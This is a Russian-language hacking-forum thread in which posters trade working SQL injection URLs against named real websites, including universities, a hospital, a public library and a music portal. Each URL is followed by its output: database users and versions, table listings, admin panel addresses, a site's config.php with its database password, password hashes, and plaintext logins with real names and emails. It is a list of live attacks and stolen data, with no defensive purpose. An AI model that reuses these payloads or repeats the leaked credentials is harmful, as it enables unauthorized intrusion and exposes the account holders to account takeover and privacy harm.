SQL Инъекции

Code:

http://www.cir.org.br/noticias.php?id=592+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22

cir_admin@localhost:cir_db:4.1.20

 

Code:

http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),17--+

db info:

Code:

[email protected] : db14709_fvh_stage : 4.1.25-Debian_mt1

 

www.rnb-music.ru

COncat'oM неполучается выводить

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--

user():altero_rnb@localhost

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--

version():5.0.22

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--

database():altero_rnb

Таблицы:

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables--

Code:

» afisha (262)
» articles (76)
» artist (44)
» ban_ip (190)
» ban_name (186)
» banners (23)
» billboard (296)
» bios (19)
» booking (6)
» catalog (3)
» celebs_comments (10331)
» chart (12521)
» chart_name (3)
» chart_type (5)
» charts (24)
» city (13)
» clubs (52)
» comments (40953)
» contest (2)
» dance (8)
» demos (19)
» demos2 (3)
» dj (23)
» dj_comments (301)
» djmail (337)
» feedback (904)
» links (823)
» lyrics (8173)
» mixes (56)
» myalbums (8)
» myphotos (1059)
» myphotos_comments (3287)
» myphotos_stats (190415)
» myphotos_text (969)
» newphotos (3538)
» news (609)
» photo_comments (19213)
» photos (122)
» q_a (25)
» releases (439)
» reviews (32)
» ru_comments (7)
» ru_rnb (10)
» ru_tracks (34)
» showed (29444)
» showed_celebs (1123)
» showed_myphotos (4235)
» subscr (153)
» test (1)
» testing (0)
» tracks (195)
» u2u (1)
» users (6873)
» videos (78)
» week_chart (1018)
» xmb_attachments (428)
» xmb_banned (46)
» xmb_buddys (342)
» xmb_captchaimages (14049)
» xmb_favorites (2127)
» xmb_forums (26)
» xmb_logs (1929)
» xmb_members (10092)
» xmb_posts (410819)
» xmb_ranks (10)
» xmb_regimages (0)
» xmb_restricted (6)
» xmb_settings (1)
» xmb_smilies (74)
» xmb_templates (199)
» xmb_themes (1)
» xmb_threads (24808)
» xmb_u2u (36507)
» xmb_vote_desc (1650)
» xmb_vote_results (2538)
» xmb_vote_voters (6188)
» xmb_whosonline (33)
» xmb_words (4)

Юзвери(около 6,5к):
Логин:

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--

Пасс:

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--

Админ:
Ник:Altero
Пасс:kexik408

Форум:
Ник:

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_members--

Пасс:

Code:

http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_members--

Админка

Code:

www.rnb-music.ru/admin

Доступ по айпи(

PR:2
ТиЦ:240

config.php

Code:

<?php

if (!defined('IN_CODE')) {
    exit("Not allowed to run this file directly.");
}

    $dbname         = 'altero_rnb';       // Name of your database
    $dbuser         = 'altero_rnb';       // Username used to access it
    $dbpw           = 'a12345';      // Password used to access it
    $dbhost         = 'localhost';  // Database host, usually 'localhost'
    $database       = 'mysql';      // Database type, currently only mysql is supported.
    $pconnect       = 0;            // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear

// Table Settings
    $tablepre       = 'xmb_';   // Table-pre

// Path-settings
    // In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
    // And please, don't forget the / at the end...
    $full_url       = 'http://rnb-music.ru/konfa/';

// Other settings
    // There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
    // tags around each template. In those cases, change the following to false, or true to turn it back on.
    // Default value: false;
    $comment_output = true;

    // Alternative mailer
    // some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
    // To get around this, we have included code which will contact a separate SMTP server of your
    // choice, and will send the mail trough that. The following mailer-options are available:
    // 'default'        => php's internal mail() function. No additional values need to be set:
    //                     (does not require a username/password/host/port)
    // 'socket_SMTP'    => a connection to the SMTP server trough sockets. Requires the username,
    //                     password, host and port values to be entered correctly to work.
    $mailer['type']     = 'default';

    // mailer-options (for socket_SMTP only, currently)
    $mailer['username'] = 'MAILER_USER';
    $mailer['password'] = 'MAILER_PASS';
    $mailer['host']     = 'MAILER_HOST';
    $mailer['port']     = 'MAILER_PORT';

// Plugin Settings
    $i = 1;
    // Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
    // To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.

    // Start Plugin code
    $plugname[$i]    = '';       // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
    $plugurl[$i]     = '';       // This is the location, link, or URL to the plugin
    $plugadmin[$i]   = false;    // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
    $plugimg[$i]     = '';       // This is the path (full URL) to the image to show in front of the text.
    $i++;
    // End plugin code.

    // Start Plugin code for plugin #2
    $plugname[$i]    = '';       // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
    $plugurl[$i]     = '';       // This is the location, link, or URL to the plugin
    $plugadmin[$i]   = false;    // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
    $plugimg[$i]     = '';       // This is the path (full URL) to the image to show in front of the text.
    $i++;
    // End plugin code for plugin #2

    // To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.

// Registration settings
    /***************
     * The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
     * this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
     ****************
     * The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
     * By default, they are not, meaning $allow_spec_q = false;
     * To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
     ****************
     * The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
     * Change the value to true to show them, or false to turn them off.
     * Default = true;
     ****************/

    $ipcheck        = 'off';
    $allow_spec_q   = true;
    $show_full_info = false;
 
    define('DEBUG', false);
    // define('DEBUG', true);

?>

 

[PR 4]

Code:

http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8-- 

4.1.20:db_opalomanpal_oman@localhost

[PR 2]

Code:

http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database(),user()),2,3-- 

5.0.45-community:db_hostpark1:hostpark1@localhost

[PR 1]

Code:

http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),database(),user())

4.0.27-icd1-log:corectadbrestige@localhost

[PR 0]

Code:

http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database(),user()),2-- 

5.0.22:citysite_inf:citysite_red@localhost

 

Database Version: 5.0.27-log
Database name: poligipzk
User name: [email protected]

Database Version: 5.0.77-log
Database name: podnikatelsky_servises
User name: [email protected]

Database Version: 5.0.67-log
Database name: u179055
User name: [email protected]

root:32f82a1f2e69453c3356be43ef06d8cc

Админка:
http://bsl-med.ru/admin/

 

http://www.che.gatech.edu {PR 5}

Code:

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--

Code:

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96--

5.0.77:dynabot2:[email protected]

Code:

http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96+from+information_schema.tables--

 

ТИЦ - 40
PR - 4

Code:

http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,password,file_priv)%20,4,5,6,7,8+from+mysql.user--+

User info:

Code:

root:141091821ee9bcaa:[COLOR=red][B]Y[/B][/COLOR]

Code:

http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8+from+mysql.user--+

db info:

Code:

[email protected] : geostroy : 4.0.12-max-nt

Admin panel:

Code:

www.geostroy.ru/admin

 

Code:

http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*

5.0.32-Debian_7etch1-log:cid:[email protected]

Code:

http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password)+from+users/*

Ann:2eb586417e7befa2

morrisr:42687b1e579d2f2c

deckerg:45ab966f48704ded

czarneckij:0560dafa54fc2cd5

jessb:40fbb0380a8eb49c

stephensd:0e0cc804789ea146

 

http://www.gcuc.edu.gh/ (PR 4)

Code:

http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3/*

4.1.22-standard-log : gardenc_db : [email protected]

users

Code:

http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,group_concat(username,0x3a,password),3+from+users/*

 

http://www.universalrights.net/news/display.php?id=5101+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*

by 4.1.9-nt:universalrights:AU20024480@localhost

http://www.satyalife.net/articles-display.php?id=-16+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5/*

[email protected]:5.0.32-Debian_7etch5-log:domainkeskus_satyalife_cms

админка
http://www.universalrights.net/login.php
pass:login
admin:admin
)))

 

http://www.jjwxc.net/topten.php?orderstr=1&timeid=-22+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6--

　4.0.27-hi4-log:selfnovel:[email protected]

сайт китайцев вроде, япану мать))

 

Code:

http://namnaren.ncm.gu.se/artikelregister/detail.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10--

db info:

Code:

root@localhost : nbaspub : 5.1.33-log

 

http://www.opcli.org/display.php?id=4+union+select+1,2,3,4+limit+1,1/*

Database Version: 4.0.27-standard-log
Database name: main2_opcli_org
User name: [email protected]

 

http://edu.e-drugdiscovery.com/qna/qna_edit.php?idx=-45365+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

 

Code:

http://www.agro-biz.com.ar/control_roya/news_view.php?id=-1+union+all+select+0,1,CONVERT(CONCAT_WS(CHAR(32,58,32),user(),database(),version())%20USING%20latin1),3,4,5,6,7,8,9--

db info:

Code:

[email protected] : agrobiz : 4.1.10a-Max

 

Едааа
http://www.psych.upenn.edu/people_info.php?id=-150+union+select+1,2,3,4,version()/*
4.0.12

 

Site: http://www.auc.ca
SQL -

Code:

http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat_ws(CHAR(32,58,32),user(),database(),version()),5--

ВЫдает***[email protected] : algomauniversity : 5.0.19-standard
Далее Таблицы:

Code:

http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,group_concat(table_name),5+from+information_schema.tables--

Таблица которая выдаст результаты***modcentre_users
Пункты в таблице modcentre_users***user_id, password, name, email, access, note
Выходит такая ссыль:

Code:

http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat(0x3a,user_id,0x3a,0x3a,0x3a,password,0x3a,name,0x3a,email),5+from+modcentre_users--

И вот конечные результаты*Юзеры

Code:

admin:::iamroot32:Administrator: : 3 - админ

5

:dgold:::dav1dg01d:David Gold:[email protected] : 3

5

:bteller:::relletb:Bev Teller: : 3

5

:sharnden:::ykj455:Sue Harnden: : 3

5

:rlinklater:::rlink45:Rose Linklater: : 3

5

:jnanne:::p6a6k8:J. Nanne:[email protected] : 3

5

:dloosemore:::dl34cv:Deborah Loosemore: : 3

5

:marasco:::ratt24:Dave Morasco: : 3

5

:kpearson:::hmrobbins:Krista Pearson:[email protected] : 3

5

:mikey:::dr1v3ll:Michael Young:[email protected] : 3

5